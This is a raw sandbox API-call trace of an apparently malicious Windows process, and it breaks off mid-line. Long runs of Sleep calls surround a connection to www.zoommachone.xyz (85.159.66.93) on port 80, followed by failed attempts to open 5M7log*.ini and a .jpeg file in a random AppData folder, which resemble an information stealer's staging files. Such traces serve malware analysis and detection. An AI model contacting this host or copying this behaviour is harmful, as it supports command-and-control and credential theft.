[0203.726] Sleep (dwMilliseconds=0x7d0) [0203.728] Sleep (dwMilliseconds=0x7d0) [0203.730] Sleep (dwMilliseconds=0x7d0) [0203.732] Sleep (dwMilliseconds=0x7d0) [0203.737] Sleep (dwMilliseconds=0x7d0) [0203.741] Sleep (dwMilliseconds=0x7d0) [0203.742] Sleep (dwMilliseconds=0x7d0) [0203.746] Sleep (dwMilliseconds=0x7d0) [0203.747] Sleep (dwMilliseconds=0x7d0) [0203.749] Sleep (dwMilliseconds=0x7d0) [0203.750] Sleep (dwMilliseconds=0x7d0) [0203.752] Sleep (dwMilliseconds=0x7d0) [0203.754] Sleep (dwMilliseconds=0x7d0) [0203.755] Sleep (dwMilliseconds=0x7d0) [0203.792] Sleep (dwMilliseconds=0x7d0) [0203.802] Sleep (dwMilliseconds=0x7d0) [0203.804] Sleep (dwMilliseconds=0x7d0) [0203.806] Sleep (dwMilliseconds=0x7d0) [0203.807] Sleep (dwMilliseconds=0x7d0) [0203.809] Sleep (dwMilliseconds=0x7d0) [0203.810] Sleep (dwMilliseconds=0x7d0) [0203.812] Sleep (dwMilliseconds=0x7d0) [0203.813] Sleep (dwMilliseconds=0x7d0) [0203.815] Sleep (dwMilliseconds=0x7d0) [0203.816] Sleep (dwMilliseconds=0x7d0) [0203.818] Sleep (dwMilliseconds=0x7d0) [0203.819] Sleep (dwMilliseconds=0x7d0) [0203.821] Sleep (dwMilliseconds=0x7d0) [0203.822] Sleep (dwMilliseconds=0x7d0) [0203.824] Sleep (dwMilliseconds=0x7d0) [0203.825] Sleep (dwMilliseconds=0x7d0) [0203.827] Sleep (dwMilliseconds=0x7d0) [0203.828] Sleep (dwMilliseconds=0x7d0) [0203.830] Sleep (dwMilliseconds=0x7d0) [0203.831] Sleep (dwMilliseconds=0x7d0) [0203.833] Sleep (dwMilliseconds=0x7d0) [0203.834] Sleep (dwMilliseconds=0x7d0) [0203.836] Sleep (dwMilliseconds=0x7d0) [0203.837] Sleep (dwMilliseconds=0x7d0) [0203.839] Sleep (dwMilliseconds=0x7d0) [0203.840] Sleep (dwMilliseconds=0x7d0) [0203.842] Sleep (dwMilliseconds=0x7d0) [0203.843] Sleep (dwMilliseconds=0x7d0) [0203.845] Sleep (dwMilliseconds=0x7d0) [0203.847] Sleep (dwMilliseconds=0x7d0) [0203.848] Sleep (dwMilliseconds=0x7d0) [0203.853] Sleep (dwMilliseconds=0x7d0) [0203.854] Sleep (dwMilliseconds=0x7d0) [0203.856] Sleep (dwMilliseconds=0x7d0) [0203.857] Sleep (dwMilliseconds=0x7d0) [0203.859] Sleep (dwMilliseconds=0x7d0) [0203.860] Sleep (dwMilliseconds=0x7d0) [0203.862] Sleep (dwMilliseconds=0x7d0) [0203.864] Sleep (dwMilliseconds=0x7d0) [0203.865] Sleep (dwMilliseconds=0x7d0) [0203.867] Sleep (dwMilliseconds=0x7d0) [0203.868] socket (af=2, type=1, protocol=6) returned 0x201c [0203.868] getaddrinfo (in: pNodeName="www.zoommachone.xyz", pServiceName="80", pHints=0x9e77a38*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x9e77a68 | out: ppResult=0x9e77a68*=0xa05efd0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f91d10*(sa_family=2, sin_port=0x50, sin_addr="85.159.66.93"), ai_next=0x0)) returned 0 [0203.945] connect (s=0x201c, name=0x9f91d10*(sa_family=2, sin_port=0x50, sin_addr="85.159.66.93"), namelen=16) returned 0 [0204.008] send (s=0x201c, buf=0x82e10fa*, len=169, flags=0) returned 169 [0204.009] setsockopt (s=0x201c, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0204.009] recv (in: s=0x201c, buf=0x127cf040, len=2048000, flags=0 | out: buf=0x127cf040*) returned 224 [0204.105] closesocket (s=0x201c) returned 0 [0204.105] Sleep (dwMilliseconds=0x7d0) [0204.107] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.107] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.107] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0204.107] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e07550) returned 1 [0204.107] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.107] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.107] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0204.107] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e06e90) returned 1 [0204.107] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.107] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.107] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0204.107] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e07550) returned 1 [0204.107] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.107] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.107] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0204.107] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e07550) returned 1 [0204.107] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.107] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.108] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0204.108] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e07820) returned 1 [0204.108] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.108] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.108] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0204.108] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e06e90) returned 1 [0204.108] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.108] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.108] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0204.108] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e06e90) returned 1 [0204.108] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.108] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.108] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0204.108] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e07550) returned 1 [0204.108] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.108] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.108] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0204.108] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e06e90) returned 1 [0204.108] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.108] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.109] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0204.109] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e07550) returned 1 [0204.109] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.109] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0204.109] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0204.109] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e071f0) returned 1 [0204.109] Sleep (dwMilliseconds=0x7d0) [0204.110] Sleep (dwMilliseconds=0x7d0) [0204.112] Sleep (dwMilliseconds=0x7d0) [0204.113] Sleep (dwMilliseconds=0x7d0) [0204.115] Sleep (dwMilliseconds=0x7d0) [0204.116] Sleep (dwMilliseconds=0x7d0) [0204.118] Sleep (dwMilliseconds=0x7d0) [0204.119] Sleep (dwMilliseconds=0x7d0) [0204.121] Sleep (dwMilliseconds=0x7d0) [0204.122] Sleep (dwMilliseconds=0x7d0) [0204.124] Sleep (dwMilliseconds=0x7d0) [0204.125] Sleep (dwMilliseconds=0x7d0) [0204.126] Sleep (dwMilliseconds=0x7d0) [0204.128] Sleep (dwMilliseconds=0x7d0) [0204.130] Sleep (dwMilliseconds=0x7d0) [0204.131] Sleep (dwMilliseconds=0x7d0) [0204.133] Sleep (dwMilliseconds=0x7d0) [0204.135] Sleep (dwMilliseconds=0x7d0) [0204.136] Sleep (dwMilliseconds=0x7d0) [0204.138] Sleep (dwMilliseconds=0x7d0) [0204.139] Sleep (dwMilliseconds=0x7d0) [0204.141] Sleep (dwMilliseconds=0x7d0) [0204.142] Sleep (dwMilliseconds=0x7d0) [0204.144] Sleep (dwMilliseconds=0x7d0) [0204.145] Sleep (dwMilliseconds=0x7d0) [0204.147] Sleep (dwMilliseconds=0x7d0) [0204.148] Sleep (dwMilliseconds=0x7d0) [0204.150] Sleep (dwMilliseconds=0x7d0) [0204.151] Sleep (dwMilliseconds=0x7d0) [0204.153] Sleep (dwMilliseconds=0x7d0) [0204.154] Sleep (dwMilliseconds=0x7d0) [0204.156] Sleep (dwMilliseconds=0x7d0) [0204.157] Sleep (dwMilliseconds=0x7d0) [0204.161] Sleep (dwMilliseconds=0x7d0) [0204.162] Sleep (dwMilliseconds=0x7d0) [0204.164] Sleep (dwMilliseconds=0x7d0) [0204.165] Sleep (dwMilliseconds=0x7d0) [0204.167] Sleep (dwMilliseconds=0x7d0) [0204.168] Sleep (dwMilliseconds=0x7d0) [0204.170] Sleep (dwMilliseconds=0x7d0) [0204.171] Sleep (dwMilliseconds=0x7d0) [0204.173] Sleep (dwMilliseconds=0x7d0) [0204.174] Sleep (dwMilliseconds=0x7d0) [0204.176] Sleep (dwMilliseconds=0x7d0) [0204.177] Sleep (dwMilliseconds=0x7d0) [0204.179] Sleep (dwMilliseconds=0x7d0) [0204.180] Sleep (dwMilliseconds=0x7d0) [0204.182] Sleep (dwMilliseconds=0x7d0) [0204.183] Sleep (dwMilliseconds=0x7d0) [0204.185] Sleep (dwMilliseconds=0x7d0) [0204.189] Sleep (dwMilliseconds=0x7d0) [0204.191] Sleep (dwMilliseconds=0x7d0) [0204.192] Sleep (dwMilliseconds=0x7d0) [0204.194] Sleep (dwMilliseconds=0x7d0) [0204.195] Sleep (dwMilliseconds=0x7d0) [0204.197] Sleep (dwMilliseconds=0x7d0) [0204.198] Sleep (dwMilliseconds=0x7d0) [0204.200] Sleep (dwMilliseconds=0x7d0) [0204.201] Sleep (dwMilliseconds=0x7d0) [0204.203] Sleep (dwMilliseconds=0x7d0) [0204.205] Sleep (dwMilliseconds=0x7d0) [0204.207] Sleep (dwMilliseconds=0x7d0) [0204.208] Sleep (dwMilliseconds=0x7d0) [0204.210] Sleep (dwMilliseconds=0x7d0) [0204.211] Sleep (dwMilliseconds=0x7d0) [0204.213] Sleep (dwMilliseconds=0x7d0) [0204.214] Sleep (dwMilliseconds=0x7d0) [0204.216] Sleep (dwMilliseconds=0x7d0) [0204.218] Sleep (dwMilliseconds=0x7d0) [0204.220] Sleep (dwMilliseconds=0x7d0) [0204.221] Sleep (dwMilliseconds=0x7d0) [0204.223] Sleep (dwMilliseconds=0x7d0) [0204.224] Sleep (dwMilliseconds=0x7d0) [0204.226] Sleep (dwMilliseconds=0x7d0) [0204.227] Sleep (dwMilliseconds=0x7d0) [0204.229] Sleep (dwMilliseconds=0x7d0) [0204.230] Sleep (dwMilliseconds=0x7d0) [0204.232] Sleep (dwMilliseconds=0x7d0) [0204.233] Sleep (dwMilliseconds=0x7d0) [0204.235] Sleep (dwMilliseconds=0x7d0) [0204.236] Sleep (dwMilliseconds=0x7d0) [0204.238] Sleep (dwMilliseconds=0x7d0) [0204.239] Sleep (dwMilliseconds=0x7d0) [0204.241] Sleep (dwMilliseconds=0x7d0) [0204.242] Sleep (dwMilliseconds=0x7d0) [0204.244] Sleep (dwMilliseconds=0x7d0) [0204.245] Sleep (dwMilliseconds=0x7d0) [0204.247] Sleep (dwMilliseconds=0x7d0) [0204.248] Sleep (dwMilliseconds=0x7d0) [0204.250] Sleep (dwMilliseconds=0x7d0) [0204.251] Sleep (dwMilliseconds=0x7d0) [0204.253] Sleep (dwMilliseconds=0x7d0) [0204.254] Sleep (dwMilliseconds=0x7d0) [0204.256] Sleep (dwMilliseconds=0x7d0) [0204.257] Sleep (dwMilliseconds=0x7d0) [0204.259] Sleep (dwMilliseconds=0x7d0) [0204.260] Sleep (dwMilliseconds=0x7d0) [0204.262] Sleep (dwMilliseconds=0x7d0) [0204.263] Sleep (dwMilliseconds=0x7d0) [0204.265] Sleep (dwMilliseconds=0x7d0) [0204.266] Sleep (dwMilliseconds=0x7d0) [0204.267] Sleep (dwMilliseconds=0x7d0) [0204.269] Sleep (dwMilliseconds=0x7d0) [0204.270] Sleep (dwMilliseconds=0x7d0) [0204.272] Sleep (dwMilliseconds=0x7d0) [0204.273] Sleep (dwMilliseconds=0x7d0) [0204.275] Sleep (dwMilliseconds=0x7d0) [0204.276] Sleep (dwMilliseconds=0x7d0) [0204.278] Sleep (dwMilliseconds=0x7d0) [0204.279] Sleep (dwMilliseconds=0x7d0) [0204.281] Sleep (dwMilliseconds=0x7d0) [0204.282] Sleep (dwMilliseconds=0x7d0) [0204.284] Sleep (dwMilliseconds=0x7d0) [0204.292] Sleep (dwMilliseconds=0x7d0) [0204.294] Sleep (dwMilliseconds=0x7d0) [0204.295] Sleep (dwMilliseconds=0x7d0) [0204.297] Sleep (dwMilliseconds=0x7d0) [0204.298] Sleep (dwMilliseconds=0x7d0) [0204.300] Sleep (dwMilliseconds=0x7d0) [0204.301] Sleep (dwMilliseconds=0x7d0) [0204.303] Sleep (dwMilliseconds=0x7d0) [0204.305] Sleep (dwMilliseconds=0x7d0) [0204.307] Sleep (dwMilliseconds=0x7d0) [0204.308] Sleep (dwMilliseconds=0x7d0) [0204.310] Sleep (dwMilliseconds=0x7d0) [0204.312] Sleep (dwMilliseconds=0x7d0) [0204.314] Sleep (dwMilliseconds=0x7d0) [0204.315] Sleep (dwMilliseconds=0x7d0) [0204.317] Sleep (dwMilliseconds=0x7d0) [0204.319] Sleep (dwMilliseconds=0x7d0) [0204.320] Sleep (dwMilliseconds=0x7d0) [0204.322] Sleep (dwMilliseconds=0x7d0) [0204.323] Sleep (dwMilliseconds=0x7d0) [0204.325] Sleep (dwMilliseconds=0x7d0) [0204.326] Sleep (dwMilliseconds=0x7d0) [0204.328] Sleep (dwMilliseconds=0x7d0) [0204.329] Sleep (dwMilliseconds=0x7d0) [0204.331] Sleep (dwMilliseconds=0x7d0) [0204.332] Sleep (dwMilliseconds=0x7d0) [0204.334] Sleep (dwMilliseconds=0x7d0) [0204.335] Sleep (dwMilliseconds=0x7d0) [0204.337] Sleep (dwMilliseconds=0x7d0) [0204.338] Sleep (dwMilliseconds=0x7d0) [0204.340] Sleep (dwMilliseconds=0x7d0) [0204.341] Sleep (dwMilliseconds=0x7d0) [0204.343] Sleep (dwMilliseconds=0x7d0) [0204.347] Sleep (dwMilliseconds=0x7d0) [0204.349] Sleep (dwMilliseconds=0x7d0) [0204.350] Sleep (dwMilliseconds=0x7d0) [0204.352] Sleep (dwMilliseconds=0x7d0) [0204.353] Sleep (dwMilliseconds=0x7d0) [0204.355] Sleep (dwMilliseconds=0x7d0) [0204.356] Sleep (dwMilliseconds=0x7d0) [0204.358] Sleep (dwMilliseconds=0x7d0) [0204.359] Sleep (dwMilliseconds=0x7d0) [0204.361] Sleep (dwMilliseconds=0x7d0) [0204.362] Sleep (dwMilliseconds=0x7d0) [0204.364] Sleep (dwMilliseconds=0x7d0) [0204.365] Sleep (dwMilliseconds=0x7d0) [0204.367] Sleep (dwMilliseconds=0x7d0) [0204.368] Sleep (dwMilliseconds=0x7d0) [0204.370] Sleep (dwMilliseconds=0x7d0) [0204.371] Sleep (dwMilliseconds=0x7d0) [0204.373] Sleep (dwMilliseconds=0x7d0) [0204.374] Sleep (dwMilliseconds=0x7d0) [0204.376] Sleep (dwMilliseconds=0x7d0) [0204.383] Sleep (dwMilliseconds=0x7d0) [0204.384] Sleep (dwMilliseconds=0x7d0) [0204.386] Sleep (dwMilliseconds=0x7d0) [0204.388] Sleep (dwMilliseconds=0x7d0) [0204.389] Sleep (dwMilliseconds=0x7d0) [0204.391] Sleep (dwMilliseconds=0x7d0) [0204.392] Sleep (dwMilliseconds=0x7d0) [0204.394] Sleep (dwMilliseconds=0x7d0) [0204.395] Sleep (dwMilliseconds=0x7d0) [0204.397] Sleep (dwMilliseconds=0x7d0) [0204.398] Sleep 